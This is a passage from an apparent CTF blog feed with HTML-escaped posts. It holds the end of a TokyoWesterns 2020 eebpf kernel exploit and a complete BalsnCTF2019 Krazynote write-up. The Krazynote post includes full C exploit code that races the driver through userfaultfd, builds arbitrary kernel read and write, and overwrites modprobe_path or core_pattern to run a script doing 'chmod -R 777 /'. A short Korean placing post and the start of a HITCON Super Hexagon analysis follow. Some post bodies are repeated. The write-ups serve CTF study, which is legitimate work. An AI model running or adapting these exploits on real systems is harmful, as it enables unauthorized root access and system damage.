map_addr = leak_bpf_map_addr(0); printf(&#34;[+] map_addr = 0x%016lx\n&#34;, map_addr); uint64_t kernel_base = aar64(map_addr) - BPF_MAP_OPS_OFFSET; printf(&#34;[+] kernel_base: 0x%016lx\n&#34;, kernel_base); const char* new_modprobe = &#34;/tmp/evil.sh&#34;; const size_t new_modprobe_len = strlen(new_modprobe); printf(&#34;[*] Overwrite modprobe to %s\n&#34;, new_modprobe); for (size_t i = 0; i &lt; new_modprobe_len; i += 8) { aaw64(kernel_base + MODPROBE_OFFSET + i, *(uint64_t*)(new_modprobe + i)); } { int fd = open(&#34;/proc/sys/kernel/modprobe&#34;, O_RDONLY); if (fd &lt; 0) { fatal(&#34;open(/proc/sys/kernel/modprobe)&#34;); } char modprobe[0x100]; read(fd, modprobe, sizeof(modprobe)); if (strncmp(modprobe, new_modprobe, new_modprobe_len)) { printf(&#34;[*] new modprobe: %s\n&#34;, modprobe); puts(&#34;[-] Failed to overwrite modprobe&#34;); return -1; } puts(&#34;[+] Successfully overwritten modprobe&#34;); } puts(&#34;[+] Get root&#34;); system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; /tmp/evil.sh&#34;); system(&#34;chmod +x /tmp/evil.sh&#34;); system(&#34;echo -e &#39;\xde\xad\xbe\xef&#39; &gt; /tmp/pwn&#34;); system(&#34;chmod +x /tmp/pwn&#34;); system(&#34;/tmp/pwn&#34;); close(mapfd); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2020/eebpf">https://gitlab.com/sajjadium/ctf-archives/-/tree/main/ctfs/TokyoWesterns/2020/eebpf</a></li> </ul> BalsnCTF2019 Krazynote /posts/kernel/write-ups/ctf/balsnctf2019-krazynote/ Fri, 24 Jan 2025 06:56:49 +0000 /posts/kernel/write-ups/ctf/balsnctf2019-krazynote/ <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>kernel version: <code>5.1.9</code></li> </ul> <h3 id="features">Features</h3> <p>This challenge provide <code>note</code> misc device with which we can save(0xffffff00) and get(0xffffff02), update(0xffffff01) data using unlocked_ioctl. When we save and get, update data on it, the xor-encrypted data is stored.</p> <p>And the struct enc_data (stored data) and struct request_t is following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> idx; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> data; </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">request_t</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">enc_data_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> xor_key; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> data_addr_minus_page_offset_base; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> enc_data[<span style="color:#ae81ff">0</span>]; <span style="color:#75715e">// Struct Hack; see https://www.geeksforgeeks.org/struct-hack/ </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>} <span style="color:#66d9ef">enc_data_t</span>; </span></span></code></pre></div><h2 id="vulnerability">Vulnerability</h2> <p>Since <code>unlocked_ioctl</code> does not perform blocked-ioctl and the device does not use mutex, we can do race condition attack easily. Furthermore in given kernel environment, non-privileged userfaultfd is allowed.</p> <hr> <h2 id="problem">Problem</h2> <h3 id="environment">Environment</h3> <ul> <li>kernel version: <code>5.1.9</code></li> </ul> <h3 id="features">Features</h3> <p>This challenge provide <code>note</code> misc device with which we can save(0xffffff00) and get(0xffffff02), update(0xffffff01) data using unlocked_ioctl. When we save and get, update data on it, the xor-encrypted data is stored.</p> <p>And the struct enc_data (stored data) and struct request_t is following:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">request_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> idx; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> data; </span></span><span style="display:flex;"><span>} <span style="color:#66d9ef">request_t</span>; </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">typedef</span> <span style="color:#66d9ef">struct</span> <span style="color:#66d9ef">enc_data_t</span> { </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> xor_key; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> size; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">uint64_t</span> data_addr_minus_page_offset_base; </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">char</span> enc_data[<span style="color:#ae81ff">0</span>]; <span style="color:#75715e">// Struct Hack; see https://www.geeksforgeeks.org/struct-hack/ </span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>} <span style="color:#66d9ef">enc_data_t</span>; </span></span></code></pre></div><h2 id="vulnerability">Vulnerability</h2> <p>Since <code>unlocked_ioctl</code> does not perform blocked-ioctl and the device does not use mutex, we can do race condition attack easily. Furthermore in given kernel environment, non-privileged userfaultfd is allowed.</p> <p>Consider following sequence:</p> <pre class="mermaid"> sequenceDiagram participant user participant device participant userfaultfd user-&gt;&gt;device: store_data(idx &lt;- 0) note over device: [0x00] enc_data(key=?,len=0x10,data=0x18) @ idx=0 device-&gt;&gt;userfaultfd: request: copy_from_user userfaultfd-&gt;&gt;device: request: reset note over device: [0x00] NULL userfaultfd-&gt;&gt;device: request: store_data(idx &lt;- 0) note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0 userfaultfd-&gt;&gt;device: request: store_data(idx &lt;- 1) note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0 note over device: [0x18] enc_data(key=?,len=0,data=0x30) @ idx=1 userfaultfd-&gt;&gt;device: response: data of copy_from_user = {0x11111111, 0x22222222, 0x33333333} note over device: [0x00] enc_data(key=?,len=0,data=0x18) @ idx=0 note over device: [0x18] enc_data(key=0x11111111,len=0x22222222,data=0x33333333) @ idx=1 user-&gt;&gt;device: get_data(idx=1) </pre> <p>As see above, we can control xor_key and size, data_addr_minus_page_offset_base of enc_data_t. Then we can leak xor_key(<code>leak_xor_key</code>) and data_addr_minus_page_offset_base(<code>leak_vuln_dev_minus_page_offset_base</code>), device(module)_base(<code>leak_vuln_dev_base</code>), page_offset_base(<code>vuln_dev_base - vuln_dev_base_minus_page_offset_base</code>), kernel_base(<code>leak_kernel_base</code>) step by step.</p> <p>As the device provide read and update features, we can make AAR &amp; AAW primitives using these features on modified enc_data.</p> <h2 id="exploit">Exploit</h2> <div class="collapsable-code"> <input id="325471986" type="checkbox" checked /> <label for="325471986"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">BalsnCTF2019-Krazynote-exploit.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>#define _GNU_SOURCE #include &lt;fcntl.h&gt; #include &lt;linux/userfaultfd.h&gt; #include &lt;poll.h&gt; #include &lt;pthread.h&gt; #include &lt;sched.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/ioctl.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;unistd.h&gt; #define VULN_DEV_NAME &#34;note&#34; #define VULN_DEV_CMD_ADD 0xffffff00 #define VULN_DEV_CMD_UPDATE 0xffffff01 #define VULN_DEV_CMD_GET 0xffffff02 #define VULN_DEV_CMD_RESET 0xffffff03 #define VULN_DEV_BASE 0xffffffffc0000000 #define VULN_DEV_MISC_FILE_OPS_OFFSET (0xffffffffc0002060 - VULN_DEV_BASE) #define VULN_DEV_MISC_FILE_OPS_UNLOCKED_IOCTL_IDX 10 #define VULN_DEV_MISC_FILE_OPS_FLUSH_IDX 14 #define VULN_DEV_OFFSET_TO_PTR_TO_KERNEL_BASE \ (0xffffffffc00021f8 - VULN_DEV_BASE) #define KERNEL_BASE 0xffffffff81000000 #define OFFSET_OF_KERNEL_ADDR_OBTAINED_BY_VULN_DEV \ (0xffffffff810a8fa0 - KERNEL_BASE) #define CORE_PATTERN_OFFSET (0xffffffff8210dbe0 - KERNEL_BASE) static void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } static void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } static int register_uffd(void* addr, size_t len, void* (*handler)(void*)) { struct uffdio_api uffdio_api; struct uffdio_register uffdio_register; pthread_t th; int uffd = syscall(__NR_userfaultfd, __O_CLOEXEC | O_NONBLOCK); if (uffd &lt; 0) { fatal(&#34;syscall(__NR_userfaultfd)&#34;); } uffdio_api.api = UFFD_API; uffdio_api.features = 0; if (ioctl(uffd, UFFDIO_API, &amp;uffdio_api) &lt; 0) { fatal(&#34;ioctl(UFFDIO_API)&#34;); } uffdio_register.range.start = (uint64_t)addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &amp;uffdio_register) &lt; 0) { fatal(&#34;ioctl(UFFDIO_REGISTER)&#34;); } if (pthread_create(&amp;th, NULL, handler, (void*)(uint64_t)uffd) &lt; 0) { fatal(&#34;pthread_create&#34;); } return uffd; } cpu_set_t target_cpu; static int vuln_dev_fd; uint64_t vuln_dev_xor_key; uint64_t vuln_dev_base_minus_page_offset_base; uint64_t vuln_dev_base; uint64_t page_offset_base; uint64_t kernel_base; typedef struct request_t { uint64_t idx; uint64_t size; uint64_t data; } request_t; static int vuln_dev_add(uint8_t size, void* data) { request_t req = { .idx = 0, .size = size, .data = (uint64_t)data, }; return ioctl(vuln_dev_fd, VULN_DEV_CMD_ADD, &amp;req); } static int vuln_dev_update(uint64_t idx, void* buf) { request_t req = { .idx = idx, .size = 0, .data = (uint64_t)buf, }; return ioctl(vuln_dev_fd, VULN_DEV_CMD_UPDATE, &amp;req); } static int vuln_dev_get(uint64_t idx, void* buf) { request_t req = { .idx = idx, .size = 0, .data = (uint64_t)buf, }; return ioctl(vuln_dev_fd, VULN_DEV_CMD_GET, &amp;req); } static int vuln_dev_reset() { request_t req = { .idx = 0, .size = 0, .data = 0, }; return ioctl(vuln_dev_fd, VULN_DEV_CMD_RESET, &amp;req); } // funtions for leaking xor_key int leaked_xor_key_bytes = 0; static void* userfault_handler_for_leak_xor_key(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_leak_xor_key: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_leak_xor_key: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_leak_xor_key: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_leak_xor_key: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } vuln_dev_reset(); memset(page, 0, 0x100); vuln_dev_add(leaked_xor_key_bytes, page); vuln_dev_add(0xff, page); copy.dst = (uint64_t)msg.arg.pagefault.address; copy.src = (uint64_t)page; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } goto DONE_PAGE_FAULT; } DONE_PAGE_FAULT: munmap(page, 0x1000); return NULL; } static uint64_t leak_xor_key() { char buf[0x100] = { 0, }; uint64_t tmp_xor_key = 0; for (int i = 0; i &lt; 8; ++i) { void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (uffd_page == MAP_FAILED) { fatal(&#34;mmap&#34;); } register_uffd(uffd_page, 0x1000, userfault_handler_for_leak_xor_key); vuln_dev_add(0x10, uffd_page); memset(buf, &#39;a&#39;, sizeof(buf)); vuln_dev_get(1, buf); int idx_61 = -1; for (int i = 0; i &lt; 0x100; ++i) { if (buf[i] == 0x61 &amp;&amp; idx_61 == -1) { idx_61 = i; } } if (idx_61 == -1) { fatal(&#34;leak_xor_key: idx_61 == -1&#34;); } tmp_xor_key |= ((uint64_t)idx_61) &lt;&lt; (i * 8); vuln_dev_reset(); munmap(uffd_page, 0x1000); ++leaked_xor_key_bytes; } return tmp_xor_key; } // funtions for leaking vuln_dev_base - page_offset_base static void* userfault_handler_for_vuln_dev_base_minus_page_offset_base( void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_leak_xor_key: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_leak_xor_key: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_leak_xor_key: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_leak_xor_key: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } vuln_dev_reset(); memset(page, 0, 0x100); vuln_dev_add(0, page); vuln_dev_add(0, page); vuln_dev_add(0, page); *(uint64_t*)(page) = vuln_dev_xor_key; *(uint64_t*)(page + 8) = 0x18 ^ vuln_dev_xor_key; copy.dst = (uint64_t)msg.arg.pagefault.address; copy.src = (uint64_t)page; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } goto DONE_PAGE_FAULT; } DONE_PAGE_FAULT: munmap(page, 0x1000); return NULL; } static uint64_t leak_vuln_dev_minus_page_offset_base() { char buf[0x100] = { 0, }; void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (uffd_page == MAP_FAILED) { fatal(&#34;mmap&#34;); } register_uffd(uffd_page, 0x1000, userfault_handler_for_vuln_dev_base_minus_page_offset_base); vuln_dev_reset(); vuln_dev_add(0x10, uffd_page); vuln_dev_get(1, buf); vuln_dev_reset(); munmap(uffd_page, 0x1000); uint64_t vuln_dev_base_minus_page_offset_base = *(uint64_t*)(buf + 0x10); return vuln_dev_base_minus_page_offset_base - 0x2568; } // functions for leaking vuln_dev_base static void* userfault_handler_for_vuln_dev_base(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_leak_xor_key: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_leak_xor_key: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_leak_xor_key: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_leak_xor_key: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } vuln_dev_reset(); memset(page, 0, 0x100); vuln_dev_add(0, page); vuln_dev_add(0, page); *(uint64_t*)(page) = vuln_dev_xor_key; *(uint64_t*)(page + 0x08) = 0x18 ^ vuln_dev_xor_key; *(uint64_t*)(page + 0x10) = (vuln_dev_base_minus_page_offset_base + VULN_DEV_MISC_FILE_OPS_OFFSET + 8 * VULN_DEV_MISC_FILE_OPS_FLUSH_IDX) ^ vuln_dev_xor_key; copy.dst = (uint64_t)msg.arg.pagefault.address; copy.src = (uint64_t)page; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } goto DONE_PAGE_FAULT; } DONE_PAGE_FAULT: munmap(page, 0x1000); return NULL; } static uint64_t leak_vuln_dev_base() { char buf[0x100] = { 0, }; void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (uffd_page == MAP_FAILED) { fatal(&#34;mmap&#34;); } register_uffd(uffd_page, 0x1000, userfault_handler_for_vuln_dev_base); vuln_dev_reset(); vuln_dev_add(0x18, uffd_page); vuln_dev_get(1, buf); vuln_dev_reset(); munmap(uffd_page, 0x1000); uint64_t tmp_vuln_dev_base = *(uint64_t*)(buf); return tmp_vuln_dev_base; } // functions for aar uint64_t aar_addr; size_t aar_size; static void* userfault_handler_for_aar(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_leak_xor_key: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_leak_xor_key: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_leak_xor_key: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_leak_xor_key: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } vuln_dev_reset(); memset(page, 0, 0x100); vuln_dev_add(0, page); vuln_dev_add(0, page); *(uint64_t*)(page) = vuln_dev_xor_key; *(uint64_t*)(page + 0x08) = aar_size ^ vuln_dev_xor_key; *(uint64_t*)(page + 0x10) = (aar_addr - page_offset_base) ^ vuln_dev_xor_key; copy.dst = (uint64_t)msg.arg.pagefault.address; copy.src = (uint64_t)page; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } goto DONE_PAGE_FAULT; } DONE_PAGE_FAULT: munmap(page, 0x1000); return NULL; } static void aar(void* out, uint64_t addr, uint64_t size) { if (size &gt;= 0x100) { fatal(&#34;aar: size &gt;= 0x100&#34;); } void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (uffd_page == MAP_FAILED) { fatal(&#34;mmap&#34;); } register_uffd(uffd_page, 0x1000, userfault_handler_for_aar); aar_addr = addr; aar_size = size; vuln_dev_reset(); vuln_dev_add(0x18, uffd_page); vuln_dev_get(1, out); vuln_dev_reset(); munmap(uffd_page, 0x1000); } // functions for aar uint64_t aaw_addr; size_t aaw_size; static void* userfault_handler_for_aaw(void* args) { if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } int uffd = (int)(long)args; char* page = (char*)mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (page == MAP_FAILED) { fatal(&#34;userfault_handler_for_leak_xor_key: mmap&#34;); } static struct uffd_msg msg; struct uffdio_copy copy; struct pollfd pollfd; pollfd.fd = uffd; pollfd.events = POLLIN; while (poll(&amp;pollfd, 1, -1) &gt; 0) { if (pollfd.revents &amp; POLLERR || pollfd.revents &amp; POLLHUP) { fatal(&#34;userfault_handler_for_leak_xor_key: poll&#34;); } if (read(uffd, &amp;msg, sizeof(msg)) &lt;= 0) { fatal(&#34;userfault_handler_for_leak_xor_key: read(uffd)&#34;); } if (msg.event != UFFD_EVENT_PAGEFAULT) { fatal( &#34;userfault_handler_for_leak_xor_key: msg.event != &#34; &#34;UFFD_EVENT_PAGEFAULT&#34;); } vuln_dev_reset(); memset(page, 0, 0x100); vuln_dev_add(0, page); vuln_dev_add(0, page); *(uint64_t*)(page) = vuln_dev_xor_key; *(uint64_t*)(page + 0x08) = aaw_size ^ vuln_dev_xor_key; *(uint64_t*)(page + 0x10) = (aaw_addr - page_offset_base) ^ vuln_dev_xor_key; copy.dst = (uint64_t)msg.arg.pagefault.address; copy.src = (uint64_t)page; copy.len = 0x1000; copy.mode = 0; copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &amp;copy) &lt; 0) { fatal(&#34;userfault_handler: ioctl(UFFDIO_COPY)&#34;); } goto DONE_PAGE_FAULT; } DONE_PAGE_FAULT: munmap(page, 0x1000); return NULL; } static void aaw(uint64_t addr, void* data, uint64_t size) { if (size &gt;= 0x100) { fatal(&#34;aar: size &gt;= 0x100&#34;); } void* uffd_page = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (uffd_page == MAP_FAILED) { fatal(&#34;mmap&#34;); } register_uffd(uffd_page, 0x1000, userfault_handler_for_aaw); aaw_addr = addr; aaw_size = size; vuln_dev_reset(); vuln_dev_add(0x18, uffd_page); vuln_dev_update(1, data); vuln_dev_reset(); munmap(uffd_page, 0x1000); } static uint64_t leak_kernel_base() { uint64_t val; aar(&amp;val, vuln_dev_base + VULN_DEV_OFFSET_TO_PTR_TO_KERNEL_BASE, 8); aar(&amp;val, val, 8); return val - OFFSET_OF_KERNEL_ADDR_OBTAINED_BY_VULN_DEV; } // end of helper functions static int overwrite_core_pattern(const char* new_core_pattern, size_t len) { aaw(kernel_base + CORE_PATTERN_OFFSET, (void*)new_core_pattern, len); int fd = open(&#34;/proc/sys/kernel/core_pattern&#34;, O_RDONLY); char buf[0x100] = { 0, }; read(fd, buf, 0x100); close(fd); if (strncmp(buf, new_core_pattern, len) != 0) { return -1; } return 0; } int main() { CPU_ZERO(&amp;target_cpu); CPU_SET(0, &amp;target_cpu); if (sched_setaffinity(0, sizeof(cpu_set_t), &amp;target_cpu)) { fatal(&#34;sched_setaffinity&#34;); } vuln_dev_fd = open(&#34;/dev/&#34; VULN_DEV_NAME, O_RDONLY); if (vuln_dev_fd &lt; 0) { fatal(&#34;open(/dev/&#34; VULN_DEV_NAME &#34;)&#34;); } vuln_dev_xor_key = leak_xor_key(); printf(&#34;[+] xor_key: 0x%lx\n&#34;, vuln_dev_xor_key); vuln_dev_base_minus_page_offset_base = leak_vuln_dev_minus_page_offset_base(); printf(&#34;[+] vuln_dev_base_minus_page_offset_base: 0x%lx\n&#34;, vuln_dev_base_minus_page_offset_base); vuln_dev_base = leak_vuln_dev_base(); printf(&#34;[+] vuln_dev_base: 0x%lx\n&#34;, vuln_dev_base); page_offset_base = vuln_dev_base - vuln_dev_base_minus_page_offset_base; printf(&#34;[+] page_offset_base: 0x%lx\n&#34;, page_offset_base); kernel_base = leak_kernel_base(); printf(&#34;[+] kernel_base: 0x%lx\n&#34;, kernel_base); puts(&#34;[*] prepare for core_pattern&#34;); const char* new_core_pattern = &#34;|//home/note/evil.sh&#34;; const size_t new_core_pattern_len = strlen(new_core_pattern); printf(&#34;[*] overwriting core_pattern to \&#34;%s\&#34;...\n&#34;, new_core_pattern); if (overwrite_core_pattern(new_core_pattern, new_core_pattern_len) &lt; 0) { fatal(&#34;overwrite_core_pattern&#34;); } puts(&#34;[*] make //home/note/evil.sh...&#34;); system(&#34;echo -e &#39;#!/bin/sh\nchmod -R 777 /&#39; &gt; //home/note/evil.sh&#34;); system(&#34;chmod +x //home/note/evil.sh&#34;); system(&#34;ulimit -c unlimited&#34;); uint64_t* evil_ptr = (uint64_t*)0xdeadbeefcafebebe; *evil_ptr = 0xdeadbeefcafebebe; close(vuln_dev_fd); return 0; }</code></pre></div> <h2 id="reference">Reference</h2> <ul> <li><a href="https://github.com/smallkirby/pwn-writeups/tree/master/balsn2019/krazynote/original">https://github.com/smallkirby/pwn-writeups/tree/master/balsn2019/krazynote/original</a></li> </ul> 피에스타 3등!! /posts/ctf/2024/fiesta/fiesta-3th/ Thu, 31 Oct 2024 18:28:45 +0000 /posts/ctf/2024/fiesta/fiesta-3th/ <p>오예</p> <p> <img src="images/fiesta2024-winner.png" alt="2024 FIESTA Winners" class="center" /> <img src="images/fiesta2024-team-info.png" alt="2024 FIESTA Team Info" class="center" /> </p> <p>오예</p> <p> <img src="images/fiesta2024-winner.png" alt="2024 FIESTA Winners" class="center" /> <img src="images/fiesta2024-team-info.png" alt="2024 FIESTA Team Info" class="center" /> </p> HITCON 2018 - Super Hexagong /posts/ctf/2018/hitcon/super-hexagon/ Sat, 17 Aug 2024 16:19:45 +0000 /posts/ctf/2018/hitcon/super-hexagon/ <p><a href="https://github.com/nafod/super-hexagon/tree/master/super_hexagon">super hexagon</a> 은 HITCON2018 에 나온 AArch64 문제이다.<br> 이 문제의 목표는 NS.EL0 에서 S.EL1 와 EL3 를 포함한 모든 Exception Level 에서 플래그를 읽는 것이다.</p> <h2 id="biosbin">Bios.bin</h2> <h2 id="동작-분석">동작 분석</h2> <h3 id="overview">Overview</h3> <p>문제에서는 bios.bin 파일이 주어진다. qemu 로 해당 바이오스를 실행하면 다음과 같은 문자가 출력되는 것을 볼 수 있다.</p> <pre tabindex="0"><code>NOTICE: UART console initialized INFO: MMU: Mapping 0 - 0x2844 (783) INFO: MMU: Mapping 0xe000000 - 0xe204000 (40000000000703) INFO: MMU: Mapping 0x9000000 - 0x9001000 (40000000000703) NOTICE: MMU enabled NOTICE: BL1: HIT-BOOT v1.0 INFO: BL1: RAM 0xe000000 - 0xe204000 INFO: SCTLR_EL3: 30c5083b INFO: SCR_EL3: 00000738 INFO: Entry point address = 0x40100000 INFO: SPSR = 0x3c9 VERBOSE: Argument #0 = 0x0 VERBOSE: Argument #1 = 0x0 VERBOSE: Argument #2 = 0x0 VERBOSE: Argument #3 = 0x0 NOTICE: UART console initialized [VMM] RO_IPA: 00000000-0000c000 [VMM] RW_IPA: 0000c000-0003c000 [KERNEL] mmu enabled INFO: TEE PC: e400000 INFO: TEE SPSR: 1d3 NOTICE: TEE OS initialized [KERNEL] Starting user program … === Trusted Keystore === Command: 0 - Load key 1 - Save key cmd&gt; </code></pre><p>위 문구를 보고 동작을 나누면 다음과 같다.</p> <p><a href="https://github.com/nafod/super-hexagon/tree/master/super_hexagon">super hexagon</a> 은 HITCON2018 에 나온 AArch64 문제이다.<br> 이 문제의 목표는 NS.EL0 에서 S.EL1 와 EL3 를 포함한 모든 Exception Level 에서 플래그를 읽는 것이다.</p> <h2 id="biosbin">Bios.bin</h2> <h2 id="동작-분석">동작 분석</h2> <h3 id="overview">Overview</h3> <p>문제에서는 bios.bin 파일이 주어진다. qemu 로 해당 바이오스를 실행하면 다음과 같은 문자가 출력되는 것을 볼 수 있다.</p> <pre tabindex="0"><code>NOTICE: UART console initialized INFO: MMU: Mapping 0 - 0x2844 (783) INFO: MMU: Mapping 0xe000000 - 0xe204000 (40000000000703) INFO: MMU: Mapping 0x9000000 - 0x9001000 (40000000000703) NOTICE: MMU enabled NOTICE: BL1: HIT-BOOT v1.0 INFO: BL1: RAM 0xe000000 - 0xe204000 INFO: SCTLR_EL3: 30c5083b INFO: SCR_EL3: 00000738 INFO: Entry point address = 0x40100000 INFO: SPSR = 0x3c9 VERBOSE: Argument #0 = 0x0 VERBOSE: Argument #1 = 0x0 VERBOSE: Argument #2 = 0x0 VERBOSE: Argument #3 = 0x0 NOTICE: UART console initialized [VMM] RO_IPA: 00000000-0000c000 [VMM] RW_IPA: 0000c000-0003c000 [KERNEL] mmu enabled INFO: TEE PC: e400000 